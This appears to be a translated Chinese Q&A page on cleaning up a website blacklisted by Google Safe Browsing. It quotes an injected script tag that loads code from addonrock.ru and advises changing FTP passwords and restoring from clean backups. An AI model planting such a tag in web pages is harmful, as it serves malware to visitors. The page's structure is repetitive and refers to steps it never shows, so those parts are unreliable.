报告攻击页面：如何解决此问题

Question 1

您的网站已被 Google 安全浏览列入黑名单。它集成在 Firefox、Safari 和 Chrome（不是 Internet Explorer）中。

首先检查 Google 安全浏览在诊断页：

Malicious software is hosted on 1 domain(s), including addonrock.ru/

因此，在某个地方，您有一个指向此域名的链接。事实上，在您所有的页面上，您都会在代码末尾的 </html> 标记后找到此内容：

<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>

您的 Web 应用程序已被黑客入侵！如果您使用的是开源应用程序，请检查是否正在运行最新版本（也请检查插件）。可能存在已知漏洞。

接下来要做的事情如下：

如果您确定攻击者没有留下任何后门，则第 4 步是可以的。当然，您永远无法 100% 确定……如果您有足够的时间和金钱，请使用新服务器来托管您的网站。

Answer

您的网站已被 Google 安全浏览列入黑名单。它集成在 Firefox、Safari 和 Chrome（不是 Internet Explorer）中。

首先检查 Google 安全浏览在诊断页：

Malicious software is hosted on 1 domain(s), including addonrock.ru/

因此，在某个地方，您有一个指向此域名的链接。事实上，在您所有的页面上，您都会在代码末尾的 </html> 标记后找到此内容：

<script type="text/javascript" src="http://addonrock.ru/Java.js"></script>

您的 Web 应用程序已被黑客入侵！如果您使用的是开源应用程序，请检查是否正在运行最新版本（也请检查插件）。可能存在已知漏洞。

接下来要做的事情如下：

如果您确定攻击者没有留下任何后门，则第 4 步是可以的。当然，您永远无法 100% 确定……如果您有足够的时间和金钱，请使用新服务器来托管您的网站。

Question 2

好吧，假设您没有故意传播恶意软件，我敢打赌您一定是被黑客入侵了，并且病毒或恶意软件正在从您的网站传播。

这页面上有关于正在发生的事情的详细信息。

删除所有内容并从已知良好的备份中恢复。

Answer

好吧，假设您没有故意传播恶意软件，我敢打赌您一定是被黑客入侵了，并且病毒或恶意软件正在从您的网站传播。

这页面上有关于正在发生的事情的详细信息。

删除所有内容并从已知良好的备份中恢复。

Question 3

addonrock.ru 和 alienradar.ru 的脚本通过 FTP 插入。

一些 Windows 恶意软件从 Filezilla 和其他常见的 FTP 客户端获取 FTP 登录信息。

基本上来说：

1) 清理您的客户端机器。2) 更改服务器上的所有密码。3) 替换所有受感染的文件。如果您无法访问日志，请将其全部替换。

Answer

addonrock.ru 和 alienradar.ru 的脚本通过 FTP 插入。

一些 Windows 恶意软件从 Filezilla 和其他常见的 FTP 客户端获取 FTP 登录信息。

基本上来说：

1) 清理您的客户端机器。2) 更改服务器上的所有密码。3) 替换所有受感染的文件。如果您无法访问日志，请将其全部替换。

报告攻击页面！